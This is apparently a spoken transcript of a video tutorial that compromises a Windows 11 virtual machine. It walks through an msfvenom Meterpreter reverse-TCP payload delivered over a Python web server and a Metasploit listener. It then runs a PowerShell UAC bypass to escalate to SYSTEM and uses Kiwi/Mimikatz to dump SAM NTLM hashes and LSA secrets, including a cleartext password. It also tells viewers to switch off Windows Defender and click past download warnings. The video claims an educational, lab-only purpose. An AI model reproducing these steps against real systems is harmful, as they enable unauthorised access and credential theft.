Hello guys, back again with another video. In case you are new to my channel, please feel free to subscribe. You can turn on the notifications icon so that you don't miss any of the video that I'll be uploading. So now in this video, I'm going to be showing you how we can attack our Windows machine using our MSF console. Then we can elevate our privileges so that we can have a administrator to our Windows machine. Later, we are going to go on and dump out the ashes on our machine. But before we start, this video is strictly made for educational purposes only, and all the testing shown in this video is performed in a controlled environment, which is the VirtualBox on my local machine. I condemn any form of hacking content with a malicious intent to harm others or with the purpose of harming others. Now let's go on and open up our terminal. For us to get access to our machine, we need to go on and craft up a payload. We are going to use MSF Venom. Just open up your terminal in your Kali Linux and just say MSF Venom. Now here we are going to go on and craft up a Windows payload. Here we are going to go on and use a -p. Then you are going to say Windows. Then let me just go on and proceed with this. Now for the format, we just need a exe. Then for our output, I'm going to just say payload. Let me just call this payload4.exe. So now when you try to see here, it is just Windows /x64/meterpreter _ reverse TCP. I provided my L host. This is the IP address of my Linux. Simply let me just come back and change this to the current one. So the current one is 43.102. So this is the current IP of my Kali Linux, and for the L port, I'm going to just leave it to 444. So if we press enter, our payload is going to be created. Then we need to send this payload to our Windows machine. We can simply just set up a Python server in our location where the payload is being created. Then we can download it on our Windows machine. Now if we come back here to our terminal, this is going to take just a few minutes, and when you try to see here, the payload is going to be created in the location for desktop, and a folder or a directory is called new. So if we come back here to my other tab for my terminal, this is simply the same location. I'm going to just go on and say ls. For now, this is the payload, but we have to first wait until it's done. Now when you try to see here, this payload is completely done. Now we need to go on and send this payload to our Windows machine. I'm going to come to this terminal. Now let's go on and set up a Python server. We are going to just say Python, or you can just say Python 3. So we are going to use a -m for a module, then http://server. Then you can go on and provide a port. We are going to just say 8000. So if we press enter, a Python server is going to be started in our Kali Linux running on port 80,000, as you already see this port here. So let's come back to our Windows machine. I'm going to go on and open up my browser. Now here I just need to provide the IP address of my Kali Linux and port 80,000. So which is 192.168.43.102 and the port of 8000. So once this loads successfully, we are going to download this application on our Windows machine. Then later we are going to go on and execute it so that we receive a meterpreter session. But since this video I'm not showcasing on how to bypass our Windows Defender, I deactivated my real-time protection on this Windows machine. So make sure you can also deactivate the real-time protection, or you can go on and watch my previous videos when I was showcasing on how you can bypass your Windows Defender. So I'm going to just proceed and download this payload. It is payload4.exe. There is a probability that this one is going to be stopped by the mark of the web. We need to just go on and keep this, or press on keep anyway. Now when you try to see here, we do have a stop on our download. This is the mark of the web, so I'm going to just click on those icons. Then I'm going to come and click on keep. Then come here, click on show more, keep anyway. This payload is going to be downloaded on our Windows machine. Now, if the application is stopped by the markup of the web and you go on to execute this application, there is a probability that the smart screen will come up when you're trying to execute this. Now, since we've deployed this application on our Windows machine, let's first come back to our Kali Linux. We need to go on and set up our MSF console. I already created another tab here with my MSF console. All I did is to type MSF console with a -q, that is for the quiet mode. Now we need to go on and set up a listener. Now we are going to just say use exploit /mouth handler, and I just missed a H. Press enter. Exploit, I missed a T. Use exploit mouth handler. Then we need to go on and set up a payload. Just come back here to your MSF Venom. I can just copy this. This is the payload that we use with my Ctrl+Shift+C. I come back here, Ctrl+Shift+V. Press enter. We need to go on and also set up my L host. So the L host, this is the IP address of my Kali Linux, similar to the IP address I provided when I was creating my payload, so which is 192.168.43.102. Then we need to go on and set up our L port. So the L port should be similar to the one that you use when you are creating your payload, which is 444. I'm going to come back here and I'm going to just say 444. Press enter. Now in case you want to see if everything is set, you can just go on and say options, or you can just type show options. Now when you try to see, this is the information that we've typed there. I'm going to just go on and just say exploit, or just type run. Now our listener is going to be set in our Kali Linux. Now when we go back to our Windows machine and we execute up that payload, we shall be able to receive back our meterpreter session. Now I'm going to just give it a few seconds so that the listener is started up here, as we can switch back to our Windows machine. Now here I can just move to the location where my file is, or I can just come here and click on open. But before I tap on open, I have to first make sure that the listener is started up, whereby it is done. So if we come back here, I'm going to just come and click on open file. Now depending on how fast your Windows machine in the VirtualBox is, this may take a few seconds or it may be faster. Now my machine might be a little bit slow, but we are going to see. Now if I come back this side to my terminal, you see that we have our meterpreter session. We do have access to our Windows machine, and if I come and I say sysinfo, press enter, you see that this is a Windows 11 machine. Now we have access to our Windows 11 machine. We need to go on and elevate our privileges so that we can dump out files from this machine. So when I go on and write a command of get system, you are going to see that it is going to fail to get a NT authority or administrator to this machine, because we need to go on and execute other programs to this victim machine so that we can have a NT authority or the administrator to our machine. You see that here it is impossible. So now here the trick that we are going to use to elevate our privilege is using a exploit that was released a couple of years back for the helper. I do have a simple script that we can go on and use. So I'm going to just go on and open up another terminal. Now in this terminal, let me go on and list. I do have this PowerShell script, and let me go on and show you what do I have in this PowerShell script. So which is bypass, micro bypass USC. So it's usc.ps1. So this is what we do have in our PowerShell script. All we need to do is to go on and edit up the script so that it can allocate the location of the payload. So this is what I have to go on and change. Since I downloaded the payload and it went to the downloads location in my Windows machine, and it's called payload4.exe. So this is what I'm going to customize in my machine so that it will be accessible with this. So I'm going to just go on and come change this. For the user, I already know the user of my machine, which is just called, sorry, now this one's going to be users /, the username is just called Greenet. All you can do within your Meterpreter session is to just go to the shell so that you know the exact user of the machine. Then here we can just go to our downloads. Now in the downloads location, this is where we do have our payload. So we are going to just say payload 4.exe. So this program is going to go on and keep up the settings in our registry, which will force this application to go on and execute with the elevated privileges. So I'm going to just go on and save this with my Ctrl S. Then I'm going to press Ctrl Q to exit while using our micro. So all I need to do is to go on and upload this script to my Windows machine. Now I'm going to come back here to my MSF console. I'm going to come back to my Meterpreter. I'm going to just say upload. What do I need to upload? This is going to be the bypass USC. So I can just come back here. I'm going to go on and copy this location with my Ctrl+Shift+C. Now if we come back here, at least if you know the path where your program is, I can just go on and say /home/Greenet, then /desktop, then onto the desktop we do have a folder which is called new, and on new, that's where we do find our file. Now after I press a space, I need to provide a path where our file is going to be saved. Now since the location of my payload, or where it was executed, it was in the desktop, if I just press enter, it is going to be uploaded in the desktop location. But if you want, you can put it in any location. So I'm not going to provide any path here. Let me just press enter. Our file has been uploaded. So if we come back here to our Windows machine and open up our file explorer, you are going to see that our bypass USC was uploaded on our Windows machine. So if we come back here to our Meterpreter session, we need to go on and execute this payload so that we get the elevated privileges. So here I'm going to just go on and just say shell, press enter. We are going to have our CMD shell so that we can proceed to executing up that PowerShell script. Now here we can just say dir. You'll be able to see your bypass usc.ps1. Now here we are going to just say PowerShell space -ep bypass. Then we are going to provide our PowerShell script, which is bypass usc.ps1. So if I go on and press enter, once this payload is executed, we need to just move back and listen to our Meterpreter session again, or to our listener. We shall receive back another session of Meterpreter, but this time it's going to be having a elevated privilege. So when I press enter, this one may take some time because a couple of scripts need to be executed on our Windows machine so that we receive back a session. So I'm going to pause this and come back when the script is done. Now when you try to see a couple of commands have been sent to our registry, and what we need to do is to just exit out of this. Then we need to background or send our Meterpreter session to the background. Just type background, then later we are going to go on and listen again. So since we are here, we can just say sessions. Now you see that we only have one session. I'm going to just go on and say run again. Now the other payload that we sent to our Windows machine, and later we send these registry keys to our Windows machine. Once that payload is executed again, we are going to be able to receive back a Meterpreter session, which is going to be having the administrator privileges. Earlier you saw when I executed get system, we couldn't have access to that system because we were not a NT authority or the user that we are using. It was just a normal user. So now when you try to see here, we have another Meterpreter session, and this time when I go to shell, or before I say get system, I can just go on and say shell. When I press enter, I'm going to just go on and say who am I. But when you try to see here, we are in system 32. I'm going to just say who am I, then slash, I'm going to just say all. So if you press enter, you see that all the information that is being returned back. And when you try to see the privilege information, we do have a couple of privileges. This is our Meterpreter 2 or session 2, where we do have a couple of privileges. So I'm going to go on and exit out of this, and let me go on and background this session. Let's go on and access our Meterpreter 1. So I'm going to just say sessions 1, and we type shell. I'm going to go on and run the same command, who am I slash all. You are going to see that here the privileges are going to be just less, whereas with our session or Meterpreter session 2, our privileges are many. So let me just go on and exit out of this. Then I'm going to background this. You can either press Ctrl Z or Z, any way you pronounce it. Then background, I just missed a R. Now let me go on and use my sessions 2. Sessions 2. Now here, if we need to get to the system, now when I just say get privs, so you can see your privileges here. You see that we do have a couple of privileges. Now I'm going to just go on and say get system. This time we shall be getting a NT authority to this machine. So if I press enter, you see here we have our system has been got, and we are the administrator. Now if we go back and we say who am I, you will see that we shall be a NT authority. Now here, if we need to go on and dump out the hashes from our computer, we can use a tool like Mimikat. In our MSF console, Mimikat is there, but we are going to load it by just a command called Kiwi. So to go on and load Mimikat, we are going to just say load Kiwi and press enter. Our Mimikat is going to be loaded in our MSF console. Then later we can proceed to dumping out the hashes. So in case you want to know how to use this, you can just go on and type help. You see that we have a bunch of commands. Now here, let me just go on and run LSA underscore dump underscore sum. Now passwords in Windows are kept in a SAM file. So if we press enter, you are going to see that we do have the NTLM hashes. Now you can just go on and save these hashes so that you can proceed to a next trick, which is pass the hash attack. So we do have the NTLM hash is there. You can just go on and save this in a separate file. Now we can also view our passwords in clear text. I'm going to just go on and say LSA. Let me just press tab. Now here's going to be LSA dump secrets. So if I press enter, you see here I have 123, our password in clear text. Now you see that in a few minutes we've managed to get access to our Windows machine. We've elevated our privilege to the administrator or the NT authority to our Windows machine, and we've also managed to dump out secrets and also our NTLM hashes on our Windows machine. Just a reminder, this video is strictly for educational purposes only. Only use the strict two machines in case you do have permissions to go on and test the machine. Now, in case you're new to the channel, please feel free to subscribe, and in case you want to see more videos, you can also feel free to subscribe, share to friends that may be interested. Have a great day. Peace.